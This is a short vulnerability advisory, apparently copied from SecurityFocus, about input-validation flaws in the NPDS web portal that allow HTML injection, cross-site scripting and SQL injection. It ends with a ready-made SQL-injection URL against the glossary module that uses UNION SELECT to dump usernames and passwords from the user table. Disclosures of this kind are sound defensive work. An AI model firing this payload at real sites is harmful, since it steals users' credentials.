10 lines
No EOL
674 B
Text
10 lines
No EOL
674 B
Text
source: https://www.securityfocus.com/bid/13803/info
|
|
|
|
NPDS is affected by multiple vulnerabilities resulting from input validation errors. These issues may allow remote attackers to carry out HTML injection, cross-site scripting and SQL injection attacks.
|
|
|
|
This may result in the theft of authentication credentials, destruction or disclosure of sensitive data, and potentially other attacks.
|
|
|
|
All versions of NPDS are considered vulnerable to this issue at the moment.
|
|
|
|
http://www.example.com/modules.php?ModPath=glossaire&ModStart=glossaire&op=rech_terme&type=3&terme=''%20='%20AND%20affiche!='0'%20UNION%20SELECT%200,0,uname,pass,0,0%20from%20user
|
|
s%20where%20uname<>''/* |